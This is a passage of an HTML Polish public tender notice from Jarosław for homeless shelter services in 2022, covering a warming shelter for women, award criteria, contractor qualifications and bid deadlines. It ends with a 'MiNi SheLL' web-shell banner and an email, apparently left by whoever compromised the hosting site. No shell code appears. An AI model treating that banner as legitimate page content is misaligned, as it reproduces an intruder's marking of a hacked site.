podmiotów prowadzących placówki udzielające wsparcia osobom bezdomnym w czasie epidemii oraz instrukcją postępowania w sytuacji podejrzenia u osoby bezdomnej zarażenia wirusem SARS-CoV-2 (procedura opublikowana jest pod adresem: https://www.gov.pl/attachment/ad6461f2-c377-4f67-a21a-c9f0d5470353). <br/>e)	Wykonawca zobowiązany będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/>f)	W przypadku gdy w trakcie realizacji zamówienia wydane zostaną nowe wytyczne bądź ustanowione zostaną określone ograniczenia, nakazy i zakazy w związku z wystąpieniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego, Wykonawca obowiązany będzie do ich wdrożenia lub zastosowania się do nich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 - Ogrzewalnia dla bezdomnych kobiet<br/><br/>1)	Przedmiotem zamówienia jest świadczenie usług schronienia w ogrzewalni dla bezdomnych kobiet z terenu Gminy Miejskiej Jarosław dla szacunkowo 1 bezdomnej kobiety w okresie od 01.01.2022 r. do 31.12.2022 r. (podana przez Zamawiającego liczba bezdomnych kobiet jest liczbą przewidywaną w całym okresie trwania niniejszego zamówienia; osoby bezdomne, będą trafiały do ogrzewalni w różnych terminach i na różne okresy czasu; Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie; z tego tytułu Wykonawcy nie będą przysługiwały żadne roszczenia, w tym pieniężne wobec Zamawiającego; Zamawiający będzie dokonywał zapłaty za faktyczną liczbę osób korzystających z usług świadczonych przez ogrzewalnię).<br/>2)	Nazwy i kody wg wspólnego słownika zamówień (CPV): 85312000-9. <br/>3)	Ogrzewalnia powinna być czynna w okresie od 01.01.2022 r. do 30.04.2022 r. oraz 01.10.2022 r. do 31.12.2022 r. przez 7 dni w tygodniu, w godzinach od 18.00 do 8.00.<br/>4)	Wykonawca zobowiązuje się przyjmować osoby bezdomne z terenu Gminy Miejskiej Jarosław do ogrzewalni bez skierowania, dowożonych przez straż miejską, policję i inne służby porządkowe, jak również zgłaszające się osobiście.<br/>5)	Ogrzewalnia obowiązana będzie do zapewnienia schronienia osobom bezdomnym umożliwiającego interwencyjny bezpieczny pobyt w ogrzewanych pomieszczeniach wyposażonych co najmniej w miejsca siedzące. <br/>6)	Do wykonywania czynności w zakresie usług świadczonych w ogrzewalni Wykonawca zobowiązany jest zatrudniać osoby, które posiadają wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy.<br/>7)	Usługi świadczone w noclegowni oraz obiekt, w którym zlokalizowana jest noclegowania muszą spełniać odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone w załączniku nr 4 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896).<br/>8)	Wykonawca wyłoniony w postępowaniu obowiązany będzie do prowadzenia dokumentacji dotyczącej osób, którym udzielono schronienia w ogrzewalni tj. karty pobytu osoby bezdomnej zawierającej datę przyjęcia do noclegowni oraz sposób w jaki osoba bezdomna trafiła do ogrzewalni, datę opuszczenia ogrzewalni, list obecności.<br/>9)	Wykonawca zobowiązany będzie do niezwłocznego pisemnego, mailowego lub telefonicznego poinformowania Zamawiającego o wszystkich sytuacjach wydalenia klienta z ogrzewalni z podaniem przyczyny w terminie nie dłuższym niż 1 dzień od dnia zdarzenia.<br/>10)	Do obowiązków Wykonawcy realizujących usługi należeć będzie:<br/>a)	wykonywanie czynności będących przedmiotem umowy pomiędzy Zamawiającym a Wykonawcą z najwyższą starannością, zgodnie z zawartą umową oraz zgodnie z ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2020 r. poz. 1876 z późn. zm.) oraz rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896) oraz nadzór nad prawidłowym jej wykonywaniem,<br/>b)	po każdym miesiącu wykonywania usług Wykonawca przedstawi Zamawiającemu fakturę/rachunek za wykonaną usługę oraz miesięczną informację składającą się z ewidencji osób przyjętych do schroniska i/lub schroniska z usługami opiekuńczymi i/lub noclegowni i/lub ogrzewalni oraz list obecności osób przebywających w w/w placówkach podpisanych przez te osoby (rozliczenie faktury/rachunku nastąpi na podstawie faktycznej ilości dni i liczby osób korzystających ze świadczenia schronienia; Zamawiający ureguluje należność powstałą z tytułu wykonania usługi schronienia w terminie 14 dni od dnia otrzymania prawidłowo otrzymanej faktury/rachunku; należność za wykonanie usługi będzie płatna na rachunek bankowy Zamawiającego wskazany na fakturze/rachunku),<br/>c)	Wykonawca obowiązany będzie do udostępniania Zamawiającemu wszelkich dokumentów związanych z realizacją umowy Zamawiającemu oraz innym uprawnionym podmiotom, w celu kontroli w zakresie prawidłowej realizacji usługi,<br/>d)	Wykonawca obowiązany będzie do wdrożenia i stosowania opracowanej przez Ministerstwo Rodziny i Polityki Społecznej Procedury dla podmiotów prowadzących placówki udzielające wsparcia osobom bezdomnym w czasie epidemii oraz instrukcją postępowania w sytuacji podejrzenia u osoby bezdomnej zarażenia wirusem SARS-CoV-2 (procedura opublikowana jest pod adresem: https://www.gov.pl/attachment/ad6461f2-c377-4f67-a21a-c9f0d5470353). <br/>e)	Wykonawca zobowiązany będzie podczas realizacji umowy do zapewnienia dostępności architektonicznej i/lub informacyjno-komunikacyjnej osobom ze szczególnymi potrzebami na poziomie minimalnych wymagań, określonych w art. 6-7 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062) oraz wykazania w ofercie konkretnych działań w tym zakresie.<br/>f)	W przypadku gdy w trakcie realizacji zamówienia wydane zostaną nowe wytyczne bądź ustanowione zostaną określone ograniczenia, nakazy i zakazy w związku z wystąpieniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego, Wykonawca obowiązany będzie do ich wdrożenia lub zastosowania się do nich. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VI SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1.	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>2.2.1.	Zamawiający wymaga, aby schronisko z usługami opiekuńczymi/noclegownia/ogrzewalnia spełniały odpowiednie warunki przeciwpożarowe i sanitarno-higieniczne oraz minimalne standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 poz.896), - (część 1-7)<br/><br/>2.3.	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku<br/>2.4.	zdolności technicznej lub zawodowej<br/>1)	Wykaz osób<br/>a.	Zamawiający wymaga, aby Wykonawca wykazał dysponowanie osobami posiadającymi kwalifikacje zawodowe niezbędne do zatrudnienia w schronisku/schronisku z usługami opiekuńczymi/noclegowni/ogrzewalni określone w art. 48a ustawy z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2019 r. poz. 1507 z późn. zm.). - (część 1-7)<br/>b.	informację o standardzie obiektu, w którym ma być realizowany przedmiot zamówienia wraz z informacją o podstawie do dysponowania tym obiektem przez Wykonawcę. <br/><br/>2)	posiada niezbędną wiedzą i doświadczenie:<br/>a.	Zamawiający wymaga, aby Wykonawca wykazał, że wykonał należycie<br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, co najmniej 2 usługi schronienia dla składanej części zamówienia; w przypadku składania oferty na co najmniej dwie części zamówienia wystarczającym będzie wykazanie się świadczeniem 2 usług schronienia dla którejkolwiek z części zamówienia, - (część 1-7)<br/><br/>Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez wykonawców usługi zostały wykonane lub są wykonywane należycie, zawierały, co najmniej:<br/>a)	wskazanie, że wykonawca składający ofertę w niniejszym postępowaniu realizował usługi, których dokumenty dotyczą,<br/>b)	wskazanie podmiotu, na rzecz którego usługi zostały wykonane,<br/>c)	wskazanie wartości i przedmiotu usługi wskazanie daty wykonania (rozpoczęcia i zakończenia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1.	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>1.2.	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 uPzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz usług będących przedmiotem zamówienia <br/>2. wykaz osób (według własnego wzoru)<br/>3. informację o standardzie obiektu</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do Oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII pkt 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/um_jaroslaw pod nazwą niniejszego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com